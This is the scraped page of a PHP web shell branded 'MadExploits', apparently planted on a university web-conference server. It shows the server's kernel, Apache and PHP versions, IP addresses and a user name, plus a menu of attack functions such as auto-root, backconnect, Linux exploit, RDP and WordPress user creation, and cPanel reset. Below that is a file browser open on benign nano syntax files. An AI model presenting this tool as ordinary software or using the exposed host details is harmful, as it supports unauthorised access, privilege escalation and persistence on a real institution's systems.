Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.117.107.50
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nano /
[ HOME SHELL ]
Name
Size
Permission
Action
asm.nanorc
884
B
-rw-r--r--
autoconf.nanorc
567
B
-rw-r--r--
awk.nanorc
1.31
KB
-rw-r--r--
c.nanorc
1.89
KB
-rw-r--r--
changelog.nanorc
712
B
-rw-r--r--
cmake.nanorc
788
B
-rw-r--r--
css.nanorc
344
B
-rw-r--r--
debian.nanorc
757
B
-rw-r--r--
default.nanorc
494
B
-rw-r--r--
elisp.nanorc
1.08
KB
-rw-r--r--
fortran.nanorc
1.92
KB
-rw-r--r--
gentoo.nanorc
4.13
KB
-rw-r--r--
go.nanorc
1.31
KB
-rw-r--r--
groff.nanorc
710
B
-rw-r--r--
guile.nanorc
587
B
-rw-r--r--
html.nanorc
1.22
KB
-rw-r--r--
java.nanorc
653
B
-rw-r--r--
javascript.nanorc
822
B
-rw-r--r--
json.nanorc
878
B
-rw-r--r--
lua.nanorc
2.41
KB
-rw-r--r--
makefile.nanorc
535
B
-rw-r--r--
man.nanorc
728
B
-rw-r--r--
mgp.nanorc
200
B
-rw-r--r--
mutt.nanorc
185
B
-rw-r--r--
nanohelp.nanorc
418
B
-rw-r--r--
nanorc.nanorc
2.79
KB
-rw-r--r--
nftables.nanorc
791
B
-rw-r--r--
objc.nanorc
1.66
KB
-rw-r--r--
ocaml.nanorc
859
B
-rw-r--r--
patch.nanorc
590
B
-rw-r--r--
perl.nanorc
1.66
KB
-rw-r--r--
php.nanorc
1.05
KB
-rw-r--r--
po.nanorc
959
B
-rw-r--r--
postgresql.nanorc
2.97
KB
-rw-r--r--
pov.nanorc
632
B
-rw-r--r--
python.nanorc
1.2
KB
-rw-r--r--
ruby.nanorc
1.49
KB
-rw-r--r--
rust.nanorc
1.08
KB
-rw-r--r--
sh.nanorc
1.46
KB
-rw-r--r--
spec.nanorc
1.88
KB
-rw-r--r--
tcl.nanorc
1.95
KB
-rw-r--r--
tex.nanorc
203
B
-rw-r--r--
texinfo.nanorc
463
B
-rw-r--r--
xml.nanorc
527
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lua.nanorc
## Syntax highlighting for Lua. # ## Original author: Matthew Wild <mwild1 (at) gmail.com> ## License: GPL 3 or later syntax lua "\.lua$" magic "Lua script" comment "--" linter luacheck --no-color color brightwhite "\[\[.*\]\]" # Operators color brightyellow ":|\*|/|%|\+|-|\^|>|>=|<|<=|~=|=|\.\.|#|\<(not|and|or)\>" # Don't partially color ... as an operator color normal "\.\.\." # Statements color brightblue "\<(do|end|while|repeat|until|if|elseif|then|else|for|in|function|local|return|break)\>" # Keywords color brightyellow "\<(_G|_VERSION|assert|collectgarbage|dofile|error|getfenv|getmetatable|ipairs|load|loadfile|module|next|pairs|pcall|print|rawequal|rawget|rawlen|rawset|require|select|setfenv|setmetatable|tonumber|tostring|type|unpack|xpcall)\s*\(" # Standard library color brightyellow "\<coroutine\.(create|isyieldable|resume|running|status|wrap|yield)\>" color brightyellow "\<debug\.(debug|(get|set)(fenv|hook|local|metatable|(up|user)value)|getinfo|getregistry|traceback|upvalue(id|join))\>" color brightyellow "\<io\.(close|flush|input|lines|output|p?open|read|tmpfile|type|write|std(in|out|err))\>" color brightyellow "\<math\.(abs|acos|asin|atan2?|ceil|cosh?|deg|exp|floor|fmod|frexp|huge|ldexp|log10|log)\>" color brightyellow "\<math\.((max|min)(integer)?|modf?|pi|pow|rad|random(seed)?|sinh?|sqrt|tan|tointeger|type|ult)\>" color brightyellow "\<os\.(clock|date|difftime|execute|exit|getenv|remove|rename|setlocale|time|tmpname)\>" color brightyellow "\<package\.(config|cpath|loaded|loadlib|path|preload|searchers|searchpath|seeall)\>" color brightyellow "\<string\.(byte|char|dump|find|format|gmatch|gsub|len|lower|match|pack|packsize|rep|reverse|sub|unpack|upper)\>" color brightyellow "\<table\.(concat|insert|maxn|move|pack|remove|sort|unpack)\>" color brightyellow "\<utf8\.(char|charpattern|codepoint|codes|len|offset)\>" # File handle methods color brightyellow ":(close|flush|lines|read|seek|setvbuf|write)\>" # External files color brightgreen "\<(dofile|require)\>" # Special words color brightmagenta "\<(false|nil|true)\>" # Decimal and hexadecimal numbers color red "\<[0-9]+(\.[0-9]*)?([Ee][+-]?[0-9]+)?\>" color red "\<0x[0-9A-Fa-f]+(\.[0-9A-Fa-f]*)?([Pp][+-]?[0-9]+)?\>" # Brackets color brightmagenta "\(|\)|\[|\]|\{|\}" # Shebang color brightcyan "^#!.*" # Strings color red ""(\\.|[^"\])*"|'(\\.|[^'\])*'" # Simple comments and multiline comments color green "--.*" color green start="--\[\[" end="\]\]"
Close